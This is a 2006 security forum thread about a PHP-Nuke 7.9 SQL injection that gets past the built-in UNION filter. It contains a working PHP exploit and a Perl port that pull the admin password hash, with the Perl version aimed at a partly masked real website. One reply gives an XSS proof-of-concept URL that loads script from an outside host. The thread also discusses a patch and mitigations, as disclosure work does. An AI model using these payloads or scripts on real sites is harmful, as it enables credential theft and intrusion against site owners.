Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 217
Members: 0
Total: 217
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> PHP-Nuke <= 7.9 SQL Injection and Bypass SQL Inj. filters
Post new topicReply to topic View previous topic :: View next topic
PHP-Nuke <= 7.9 SQL Injection and Bypass SQL Inj. filters
PostPosted: Mon Oct 23, 2006 1:58 pm Reply with quote
Paisterist
Valuable expert
Valuable expert
Joined: Oct 23, 2006
Posts: 6
Location: Argentina




Code:
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22
--------------------------------------------------------
Program: PHP-Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP Nuke <= 7.9
Risk: High!
Impact: Critical Risk

-==PHP-Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.

- Tested
---------------------------------------------------------
localhost & many sites

- Vulnerability Description
---------------------------------------------------------

The most important and critical vulnerability is in the code designed to filter the POST inputs to protect the script against
SQL Injections.


==[ mainfile.php 143-146 ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
header("Location: index.php");
die();
}
[...]
==[ end mainfile.php ]==============================

The protection is very good... but we can bypass it by using something like '/**/UNION ' or ' UNION/**/' ;)

Also i found a SQL Injection vulnerability in the Encyclopedia module. The "eid" variable isn't filtered at any moment, so if
we bypass the sql injection protection we can execute arbitrary sql commands. With a simple UNION statement we get the
md5 hash of the admin password.

Here is the real life Proof of Concept exploit.

==Real Proof of Concept exploit==
<?
/*

Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net

*/

$host="localhost";
$path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1";

if ($fp) {
$p="POST ".$path."modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";
$p.="Referer: http://$host".$path."modules.php?name=Encyclopedia&file=search\r\n";
$p.="Accept-Language: es-ar\r\n";
$p.="Content-Type: application/x-www-form-urlencoded\r\n";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$p.="Host: $host\r\n";
$p.="Content-Length: ".strlen($data)."\r\n";
$p.="Pragma: no-cache\r\n";
$p.="Connection: keep-alive\r\n\r\n";
$p.=$data;

fwrite($fp, $p);

while (!feof($fp)) {
$content .= fread($fp, 4096);
}

preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

print "<b>Hash: </b>".$matches[0];
}
?>
==Real Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.

- How to fix it? More information?
--------------------------------------------------------

You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 143 of mainfile.php, adding one more protection like:

==[ mainfile.php old line (143) ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
}
[...]
==[ end mainfile.php ]=====================================

==[ mainfile.php new line (143) ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64,
'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
}
[...]
==[ end mainfile.php ]=====================================

That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days... it is not
free at the moment.

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=27

- Credits
--------------------------------------------------------
Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com
SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal
Knightmare

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */


I'm sure that there are a lot of more SQL Injections in PHP-Nuke... the important thing isn't the sql injection bug but the sql injection protection bypass Wink

See you

P.D: thats a 5-min coded exploit... i'm not interested to coding a really well working exploit.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Oct 23, 2006 10:01 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




There is one big (really big!) mitigating factor, not mentioned in advisory - this kind of sql injection exists only, if php settings have:

magic_quotes_gpc = Off

In real world servers there is very few servers with such settings.
And by the way, let's see source code from "modules/Your_Account/index.php" line ~812:

Code:

function login($username, $user_password, $redirect, $mode, $f, $t, $random_num, $gfx_check) {
global $setinfo, $user_prefix, $db, $module_name, $pm_login, $prefix;
include("config.php");
$sql = "SELECT user_password, user_id, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax FROM ".$user_prefix."_users WHERE username='$username'";



As you can see, there is no additional "addslashes()" or "mysql_real_escape_string()" used. So basically:

IF php does not use "magic quotes" THEN sql injection exists even in user login function and basically user named "o'neill" can't log in becasue of the sql error Wink

So this kind of problem can be rated as "low" or "medium" by my opinion.

Discussion is welcome!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Oct 24, 2006 2:55 am Reply with quote
Paisterist
Valuable expert
Valuable expert
Joined: Oct 23, 2006
Posts: 6
Location: Argentina




I forgot to talk about magic_quotes_gpc... the critical bug is the sql injection protection bypass... the encyclopedia module bug is a stupid one, there are some more sql injection vulnerabilities on the script Wink

See you
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Oct 24, 2006 1:38 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, encyclopedia module contains some very old XSS flaws:

http://archives.neohapsis.com/archives/bugtraq/2004-06/0186.html

I have been reporting them more than 2 years ago and still they are unpatched Smile

Thumbs up, Francisco Burzi Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Oct 25, 2006 3:45 am Reply with quote
Paisterist
Valuable expert
Valuable expert
Joined: Oct 23, 2006
Posts: 6
Location: Argentina




:O I saw some XSS vulnerabilities searching at Google... but i didn't know that the vulnerabilities where not patched :p

Basically the advisory it's to show how to bypass the sql injection protection... that's the interesting thing =)

See you
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Oct 29, 2006 5:52 pm Reply with quote
Ghozt
Beginner
Beginner
Joined: Apr 16, 2006
Posts: 2




waraxe wrote:
By the way, encyclopedia module contains some very old XSS flaws:

http://archives.neohapsis.com/archives/bugtraq/2004-06/0186.html

I have been reporting them more than 2 years ago and still they are unpatched Smile

Thumbs up, Francisco Burzi Cool


A lot of PHP-Nuke modules are vulnerable to XSS injection, even on phpnuke.org and nukecops.com, Search, Downloads, most things that allow user input. PoC: http://www.phpnuke.org/modules.php?name=Search&query=<script src=http://ha.ckers.org/xss.jpg &topic=&category=0&author=&days=0&type=stories
You just need to break out and leave it open.
View user's profile Send private message
PostPosted: Mon Nov 06, 2006 10:16 am Reply with quote
bima
Regular user
Regular user
Joined: Jun 14, 2004
Posts: 16
Location: dunia fana




Paisterist wrote:
I forgot to talk about magic_quotes_gpc... the critical bug is the sql injection protection bypass... the encyclopedia module bug is a stupid one, there are some more sql injection vulnerabilities on the script Wink

See you


The perl version :

Code:

#!/usr/bin/perl
#

use LWP;
use HTTP::Cookies;


$log = "posku_postnukersss.txt";
$Agent = "MSIE";
#$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);
@waktu = localtime(time);
$cookies = $waktu[2].'-'.$waktu[1].'-'.$waktu[0].'cookies.txt';
$browser->cookie_jar(HTTP::Cookies->new(file => $cookies, autosave => 1));

$url = 'http://www.casiXXXXXXXX.com/modules.php?name=Encyclopedia&file=search';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend = "query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1";
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginrequest->referer($url);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#printlog($logincek."\n\n");
my $kutukupret=join("",$loginresponse->as_string);
$kutukupret=~ s/<!-(.*?)->//sg;
$kutukupret=~ s/<[^>]*>//sg;
$kutukupret=~ s/\s{2,}/ /sg;
$cucok=$kutukupret=~m/Return to ([a-zA-Z0-9]{32}) \]\[/sg;
if ($cucok) {printlog("Hash : $1\n");}
else {printlog("\nHasil tidak cocok !\n");
printlog($loginresponse->as_string);
die("Error...\n\n");
}

sub printlog {
print @_[0];
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}



To obtain the admin's name, u can replace the pwd with
aid in the query above... of course u must see carefully
the server's responce, coz the regex above only catch
the md5 hash (password) only Smile

Have a nice day...

./iko94
iko94.blogspot.com
View user's profile Send private message Visit poster's website
PHP-Nuke <= 7.9 SQL Injection and Bypass SQL Inj. filters
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.380 Seconds